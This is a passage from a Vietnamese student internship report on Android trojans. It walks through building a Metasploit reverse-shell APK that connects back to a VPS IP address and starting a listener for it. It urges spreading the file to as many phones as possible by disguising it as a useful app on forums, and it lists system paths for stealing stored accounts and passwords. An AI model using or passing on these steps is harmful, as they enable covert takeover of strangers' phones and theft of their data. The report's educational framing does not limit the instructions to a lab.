Tấn công Android từ VPS

Một phần của tài liệu BÁO cáo đề tài THỰC tập CNTT nghiên cứu các trojan, malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điên thoại sử dụng android và gửi ra ngoài (Trang 75)

Để tiến hành, ta khởi động Kali Linux để tạo một file .apk có chứa mã độc nhằm phục vụ cho việc tấn công Android (chi tiết các bước thực hiện có thể tham khảo ở trên). Trong Kali Linux khởi động Terminal tiến hành nhập lệnh:

SVTH: Nguyễn Đức Thái Trang 61

Msfpayload android/meterpreter/reverse_tcp lhost=103.20.148.71 lport=4444 R> /root/Desktop/vps.apk

Trong đó lhost=103.20.148.71 là địa chỉ IP của VPS.

Hình 6.13: Tao backdoor.

Sau khi chạy xong ta được file vps.apk là file có chứa mã độc dùng để tấn công Android. Ở đây việc cần làm là phát tán file này đến càng nhiều máy Android càng tốt. Ta có thể thực hiện bằng cách ngụy trang thành các ứng dụng có ích và chia sẻ trên các diễn đàn về điện thoại Android.

Tiếp theo tiến hành kết nối đến VPS và khởi động Metasploit Console tại đường dẫn Start => Programs => Metasploit => Metasploit Console.

Hình 6.14: Metasploit console.

Tại của sổ dòng lệnh ta nhập:

Use exploit/multi.hander

SVTH: Nguyễn Đức Thái Trang 62

Set lhost 103.20.148.71 – với lhost là địa chỉ IP của VPS đã nhập ở trên. Set lport 4444 – tương tự lport ở trên.

Hình 6.15: thiết lập thông tin cho cổng lắng nghe.

Tiếp theo nhập lện run để mở cổng lắng nghe.

Hình 6.16: mở cổng lắng nghe.

Sau khi hoàn thành bước này, việc cần làm là chờ cho đến khi có máy một Android nào đó có kết nối internet và cài đặt, khởi động file vps.apk ở trên. Khi đó ta được như hình:

Hình 6.17: Kết nối thành công.

Như vậy ta đã thành công xâm nhập vào máy Android. Tại đây ta có thể tiến hành điều khiển, đánh căp dữ liệu như đã trình bày trong phần sử dụng Kali Linux. Mặc dù đã thành công xâm nhập vào Android nhưng một số trường hợp trong quá trình khai thác dữ liệu sẽ báo lỗi do không đủ quyền hạn truy cập hệ thống. Đây là cơ chế bảo mật của Android để bảo vệ những dữ liệu quan trọng. Trong trường hợp này, việc khai thác dữ liệu sẽ gặp rất nhiều hạn chế hoặc thông thể thực hiện với dữ liệu quan trọng.

SVTH: Nguyễn Đức Thái Trang 63 Một trường hợp khác là sau khi xâm nhập thành công vào Android liền có quyền hàn tối cao (system). Đây là do máy Android bị xâm nhập đã được người sử dụng root (chiếm quyền điều khiển). Trường hợp này ta có thể tùy ý khai thác máy Android.

Để kiểm tra máy Android đã root chưa ta vào điều khiển trong môi

trường shell và nhập lệnh :

su

whoami

Nếu báo unknown id is 0 tức là đã root

ls -l danh mục file và các quyền

cd để chuyển hướng thư mục

Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền

/DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/

Để xem danh sách và download các file hay thay đổi các file trong ROM Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập

để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data

Ctrl + C để quay lại (adsbygoogle = window.adsbygoogle || []).push({});

SVTH: Nguyễn Đức Thái Trang 64

CHƯƠNG 7: KẾT QUẢ ĐẠT ĐƯỢC.

Những kiến thức lý thuyết đã được củng cố:

 Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành

Android

 Tìm hiểu về hệ điều hành Kali Linux

 Tìm hiểu về các lỗ hổng bảo mật của Windows và Android

 Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng

Những kỹ năng thực hành đã được học thêm:

 Thực hiện cài đặt Android trên máy ảo

 Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật

của Windows và Android

 Thi lấy chứng chỉ System Hacking của trung tâm Athena

 Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt

vào Android

 Biết thêm về một số bài học trong lớp Hacker mũ trắng

Những kinh nghiệm thực tiễn đã tích lũy được:

Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập trong môi trường doanh nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng xử.

SVTH: Nguyễn Đức Thái Trang 65

CHƯƠNG 8: TÀI LIỆU THAM KHẢO

[1] Đĩa lab Athena Android.

[2] http://www.vietnamandroid.com/ [3] http://vi.wikipedia.org/wiki/Android [4] http://forum.genk.vn/threads/147/ [5] http://phienbanmoi.com/threads/lich-su-ra-doi-he-dieu-hanh-android-tai-lieu- huong-dan-lap-trinh.107/ [6] http://sohoa.vnexpress.net/tin-tuc/doi-song-so/thi-truong/ios-bam-duoi-quyet- liet-android-ve-thi-phan-di-dong-2960981.html [7] http://forum.bkav.com.vn/showthread.php/99182-hieu-chinh-xac-ve-cac-loai- ma-doc [8] http://www.nguoiduatin.vn/mat-39-ty-dongngay-vi-ma-doc-a137388.html

Một phần của tài liệu BÁO cáo đề tài THỰC tập CNTT nghiên cứu các trojan, malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điên thoại sử dụng android và gửi ra ngoài (Trang 75)